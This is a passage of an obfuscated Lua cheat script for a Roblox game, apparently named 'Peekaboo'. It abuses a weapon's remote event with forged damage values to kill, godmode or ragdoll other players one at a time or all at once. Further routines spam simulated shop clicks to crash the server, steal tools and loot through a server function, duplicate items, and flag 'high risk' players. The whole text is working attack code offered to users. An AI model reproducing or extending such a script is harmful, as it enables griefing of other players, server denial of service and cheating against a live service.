,1);v666.Anchored=false;v666.CanCollide=false;v666.Name="killaura_"   .. v302(6 + 2 ) ;v666.Parent=workspace;v666.Transparency=3 -2 ;local v676=math.rad((v665/(5 + 25)) * (837 -477) );local v677=math.cos(v676) * v299 ;local v678=math.sin(v676) * v299 ;v666.Position=v297.Position + Vector3.new(v677,2,v678) ;local v680=Instance.new("BodyVelocity");v680.MaxForce=Vector3.new(4520 -(150 + 370) ,5282 -(74 + 1208) ,9838 -5838 );v680.Velocity=Vector3.new(0 -0 ,10,0 + 0 );v680.Parent=v666;table.insert(v300,v666);end v301=true;break;end end end end local function v304(v397) for v446,v447 in ipairs(v300) do if v447 then v447.Transparency=(v397 and (390 -(14 + 376))) or (1 -0) ;v447.CanCollide=v397;end end end local function v305() local v398=2 + 0 ;for v448,v449 in ipairs(v300) do local v450=0;local v451;local v452;local v453;local v454;while true do if (v450==(2 + 0)) then v449.Position=v297.Position + Vector3.new(v452,v454,v453) ;break;end if (v450==(0 + 0)) then v451=((v448/(87 -57)) * (2 + 0) * math.pi) + ((v398 * tick())%(2 * math.pi)) ;v452=math.cos(v451) * v299 ;v450=79 -(23 + 55) ;end if (v450==(2 -1)) then v453=math.sin(v451) * v299 ;v454=2 + 0 ;v450=2 + 0 ;end end end end v303();local function v306() local v399=game.Players:GetPlayers();for v455,v456 in ipairs(v399) do if ((v456~=v295) and v456.Character and v456.Character:FindFirstChild("HumanoidRootPart")) then local v549=0 -0 ;local v550;local v551;local v552;while true do if (v549==(0 + 0)) then v550=v456.Character.HumanoidRootPart.Position;v551=v297.Position;v549=1;end if (v549==(902 -(652 + 249))) then v552=(v550-v551).magnitude;if (v552<=v299) then local v748=v295.Backpack:FindFirstChild("Fist");if (v748 and v748:FindFirstChild("Script")) then v748.Script.egma:FireServer(v456.Character.UpperTorso,267 -167 ,v295.Character.RightHand);end end break;end end end end end local function v307() local v400=1868 -(708 + 1160) ;local v401;while true do if (v400==(0 -0)) then v401=game.Players:GetPlayers();for v619,v620 in ipairs(v401) do if ((v620~=v295) and v620.Character and v620.Character:FindFirstChild("HumanoidRootPart")) then local v687=0;local v688;local v689;local v690;while true do if (v687==1) then v690=(v688-v689).magnitude;if (v690<=v299) then local v812=v295.Backpack:FindFirstChild("Fist");if (v812 and v812:FindFirstChild("Script")) then v812.Script.egma:FireServer(v620.Character.UpperTorso, -10,v295.Character.RightHand);end end break;end if (v687==0) then v688=v620.Character.HumanoidRootPart.Position;v689=v297.Position;v687=1 -0 ;end end end end break;end end end if premium then local v457=0;local v458;while true do if ((27 -(10 + 17))==v457) then v458=v260.element("Toggle","Kill Aura",false,function(v644) _G.killauracircle=v644.Toggle;if _G.killauracircle then v304(true);spawn(function() while _G.killauracircle do task.wait();v305();v306();end end);else local v718=0 + 0 ;while true do if (v718==(1732 -(1400 + 332))) then _G.killauracircle=false;v304(false);break;end end end end);v458=v260.element("Toggle","Heal Aura",false,function(v646) local v647=0 -0 ;while true do if (v647==0) then _G.healauracircle=v646.Toggle;if _G.healauracircle then local v805=1908 -(242 + 1666) ;while true do if (v805==(0 + 0)) then v304(true);spawn(function() while _G.healauracircle do local v881=0 + 0 ;while true do if (v881==(1 + 0)) then v307();break;end if (v881==(940 -(850 + 90))) then task.wait();v305();v881=1 -0 ;end end end end);break;end end else _G.killauracircle=false;v304(false);end break;end end end);break;end end end local v308=nil;local v279=v260.element("TextBox","Player Name",nil,function(v402) v308=v402.Text;end);local v293=v260.element("Button","Kill Player",false,function(v404) local v405=game.Players[v308];game.Players.LocalPlayer.Backpack:WaitForChild("Fist").Script.egma:FireServer(v405.Character.UpperTorso,v405.Character.Humanoid.Health,game.Players.LocalPlayer.Character.RightHand);wait(1392 -(360 + 1030) );local v406=Notif:Notify("Targets Health: "   .. tostring(v405.Character.Humanoid.Health) ,4 + 0 ,"information");end);if premium then local v459=v260.element("Button","Godmode Player",false,function(v504) local v505=game.Players[v308];game.Players.LocalPlayer.Backpack:WaitForChild("Fist").Script.egma:FireServer(v505.Character.UpperTorso, -math.huge,game.Players.LocalPlayer.Character.RightHand);wait(5 -3 );local v506=Notif:Notify("Targets Health: "   .. tostring(v505.Character.Humanoid.Health) ,5 -1 ,"information");end);local v459=v260.element("Button","Godmode All",false,function(v507) for v553,v554 in pairs(game.Players:GetChildren()) do local v555=1661 -(909 + 752) ;while true do if (v555==(1224 -(109 + 1114))) then game.Players.LocalPlayer.Backpack:WaitForChild("Fist").Script.egma:FireServer(v554.Character.UpperTorso, -math.huge,game.Players.LocalPlayer.Character.RightHand);break;end if ((0 -0)==v555) then wait(0.3 + 0 );print(v554.Name);v555=243 -(6 + 236) ;end end end local v508=Notif:Notify("Attempted to godmode all",3 + 1 ,"information");end);local v459=v260.element("Button","Kill all",false,function(v509) for v556,v557 in pairs(game.Players:GetChildren()) do local v558=0 + 0 ;while true do if (v558==(0 -0)) then wait(0.3 -0 );if (v557.Name~=game.Players.LocalPlayer.Name) then game.Players.LocalPlayer.Backpack:WaitForChild("Fist").Script.egma:FireServer(v557.Character.UpperTorso,v557.Character.Humanoid.Health,game.Players.LocalPlayer.Character.RightHand);end break;end end end local v510=Notif:Notify("Attempted to kill all",1137 -(1076 + 57) ,"information");end);local v459=v260.element("Button","Ragdoll all",false,function(v511) local v512=nil;for v559,v560 in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if v560:FindFirstChild("Stuff") then v512=v560;end end if (v512==nil) then local v621=Notif:Notify("No gun in inventory",4,"information");else local v622=0;local v623;while true do if (v622==(1 + 0)) then wait();for v750,v751 in pairs(game.Players:GetChildren()) do if v751.Character then if (v751.Name~=game.Players.LocalPlayer.Name) then local v814={[1]=v512,[2]=v751.Character.RightLowerLeg,[3]=Vector3.new(3262.336669921875 -(579 + 110) , -305.27593994140625, -(13.964950561523438 + 148)),[4 + 0 ]=Vector3.yAxis,[3 + 2 ]=Vector3.new(0.335058331489563, -0.1915476769208908, -(407.92252123355865 -(174 + 233)))};game:GetService("ReplicatedStorage"):WaitForChild("Communication"):WaitForChild("Events"):WaitForChild("3"):FireServer(unpack(v814));game.Players.LocalPlayer.Backpack:WaitForChild("Fist").Script.egma:FireServer(v751.Character.UpperTorso, -(55 -35),game.Players.LocalPlayer.Character.RightHand);end end end v622=3 -1 ;end if (v622==(0 + 0)) then for v752,v753 in pairs(game:GetService("ReplicatedStorage").Communication.Events:GetChildren()) do v753.Name=v752;end v512.Parent=game.Players.LocalPlayer.Character;v622=1175 -(663 + 511) ;end if (v622==(3 + 0)) then v623=Notif:Notify("Ragdolled all players",1 + 3 ,"information");break;end if (2==v622) then wait(2 -1 );v512.Parent=game.Players.LocalPlayer.Backpack;v622=3;end end end end);local v459=v260.element("Button","Crash Server (requires 300k)",false,function(v513) local v514=0;local v515;local v516;local v517;local v518;local v519;local v520;local v521;local v522;while true do if (v514==6) then print("Number of tools in the workspace: "   .. v522 );break;end if (0==v514) then v515=2000;for v691,v692 in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if (v692:IsA("Tool") and (v692.Name=="Money Flex")) then v692.Parent=game.Players.LocalPlayer.Character;task.wait();v692.Parent=workspace;end end wait();fireclickdetector(game.Workspace.IllegalDealer.ClickDetector);v514=1;end if (v514==(2 + 1)) then v517=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.exit;v516:SendMouseButtonEvent(v517.AbsolutePosition.X + 20 ,v517.AbsolutePosition.Y + (188 -108) ,0 -0 ,true,game,0 + 0 );wait();v516:SendMouseButtonEvent(v517.AbsolutePosition.X + 20 ,v517.AbsolutePosition.Y + (155 -75) ,0 + 0 ,false,game,0 + 0 );v514=4;end if ((726 -(478 + 244))==v514) then v518=game.Players.LocalPlayer;v519=v518.Character or v518.CharacterAdded:Wait() ;v520=v519:FindFirstChildOfClass("Humanoid");v521=Notif:Notify("Crash started, idea by @cursed4evr",521 -(440 + 77) ,"information");v514=3 + 2 ;end if (v514==5) then for v693,v694 in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if (v694:IsA("Tool") and (v694.Name=="Money Flex")) then v694.Handle:Destroy();v694.Parent=game.Players.LocalPlayer.Character;task.wait();v694.Parent=workspace;end end wait();v522=0 -0 ;for v695,v696 in pairs(game.Workspace:GetChildren()) do if v696:IsA("Tool") then v522=v522 + (1557 -(655 + 901)) ;end end v514=6;end if (v514==(1 + 0)) then game.Players.LocalPlayer.PlayerGui:WaitForChild("DealerGui");game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame.Visible=true;game.Players.LocalPlayer.PlayerGui.DealerGui.Frame.Visible=false;v516=game:GetService("VirtualInputManager");v514=2 + 0 ;end if (v514==(2 + 0)) then v517=game.Players.LocalPlayer.PlayerGui.DealerGui.ShopFrame["Money Flex"];game:GetService("RunService"):Set3dRenderingEnabled(false);for v697=1,v515 * (3.3 -2)  do task.wait();v516:SendMouseButtonEvent(v517.AbsolutePosition.X + (1465 -(695 + 750)) ,v517.AbsolutePosition.Y + 80 ,0 -0 ,true,game,0 -0 );task.wait();v516:SendMouseButtonEvent(v517.AbsolutePosition.X + (80 -60) ,v517.AbsolutePosition.Y + (431 -(285 + 66)) ,0 -0 ,false,game,0);end game:GetService("RunService"):Set3dRenderingEnabled(true);v514=1313 -(682 + 628) ;end end end);end local v309=v264.element("Toggle","Tool Stealing",false,function(v407) local v408=0;while true do if (v408==(0 + 0)) then _G.ToolStealing=v407.Toggle;while _G.ToolStealing do game:GetService("RunService").RenderStepped:wait();if game.Workspace:FindFirstChildOfClass("Tool") then game.Players.LocalPlayer.Character.Humanoid:EquipTool(game.Workspace:FindFirstChildOfClass("Tool"));end end break;end end end);local v310=v264.element("Toggle","Loot Stealing",false,function(v409) _G.LootStealing=v409.Toggle;while _G.LootStealing do wait(299.5 -(176 + 123) );for v523,v524 in pairs(game.Players:GetChildren()) do spawn(function() local v562={[1]=v524};game:GetService("ReplicatedStorage"):WaitForChild("LootPlayerRF"):InvokeServer(unpack(v562));end);end end end);local v311=32;local v312="";local v293=v263.element("Button","Duplicate",false,function(v411) local v412=0 + 0 ;while true do if (v412==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=game.Workspace.SafeZones:GetChildren()[10].CFrame;game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Dead);break;end end end);wait(0.1 + 0 );for v413,v414 in pairs(game.Players:GetChildren()) do if v414.Character then local v525=269 -(239 + 30) ;local v526;while true do if (v525==0) then v526=v414.Character:FindFirstChild("Head");if v526 then local v723=0;local v724;while true do if (v723==(0 + 0)) then v724=v526:FindFirstChild("NameGui");if v724 then local v815=v724:FindFirstChild("Main");if v815 then local v858=0 + 0 ;local v859;while true do if (v858==0) then v859=v815:FindFirstChild("Extras");if v859 then local v887=v859.Text;if (v887~="") then Notif:Notify(v414.Name   .. " has an emoji: "   .. v887 ,6 -2 ,"alert");end end break;end end end end break;end end end break;end end end end local v313=false;game.Players.LocalPlayer.CharacterAdded:Connect(function(v415) wait(2);fly();end);local function v314(v416,v417) local v418=0 -0 ;local v419;local v420;local v421;while true do if (v418==(315 -(306 + 9))) then v419=game:GetService("TweenService");v420=Instance.new("Part");v420.Anchored=true;v420.CanCollide=false;v418=3 -2 ;end if (1==v418) then v420.Material=Enum.Material.ForceField;v420.Color=Color3.new(0.3921568627 + 0 ,0.3921568627 + 0 ,1 + 0 );v420.Size=Vector3.new(0.1,0.1,(v416-v417).magnitude);v420.CFrame=CFrame.new(v416,v417) * CFrame.new(0 -0 ,0, -v420.Size.Z/(1377 -(1140 + 235)) ) ;v418=2 + 0 ;end if (v418==(3 + 0)) then v421.Completed:wait();v420:Destroy();break;end if (v418==(1 + 1)) then v420.Name=tostring(math.random(53 -(33 + 19) ,10000000));v420.Parent=game.Workspace;v421=v419:Create(v420,TweenInfo.new(1 + 1 ,Enum.EasingStyle.Linear,Enum.EasingDirection.Out,0 -0 ,false,0),{Transparency=1 + 0 });v421:Play();v418=5 -2 ;end end end local function v315() local v422=game.Players.LocalPlayer;local v423=v422:GetMouse();if v423 then local v527=v422.Character:FindFirstChildOfClass("Tool");if v527 then if v527:FindFirstChild("Handle") then if v527.Handle:FindFirstChild("barrel") then local v759=v527.Handle.barrel.WorldPosition;local v760=v423.Hit.p;v314(v759,v760);end end end end end game.Players.LocalPlayer.CharacterAdded:Connect(function(v424) wait(2);fly();end);game:GetService("UserInputService").InputBegan:Connect(function(v425) if (v425.UserInputType==Enum.UserInputType.MouseButton1) then if _G.tracers then v315();end end end);local v316=Notif:Notify("Loaded Peekaboo.",4 + 0 ,"information");wait(0.1);for v426,v427 in pairs(game.Players:GetChildren()) do if v427.Character then if v427.Character:FindFirstChild("Head") then if v427.Character.Head:FindFirstChild("NameGui") then local v698=689 -(586 + 103) ;local v699;local v700;while true do if (v698==(0 + 0)) then v699=v427.Character.Head.NameGui.Main.Level.Text;v700=string.gmatch(v699,"%d+");v698=1;end if (v698==(2 -1)) then for v806 in v700 do if (tonumber(v806)>(1788 -(1309 + 179))) then local v816=Notif:Notify(v427.Name   .. " is a high risk player." ,6 -2 ,"alert");end end break;end end end end end end else setclipboard(tostring(v0));end else local v194=Notif:Notify("Script down.",1 + 1 ,"alert");end
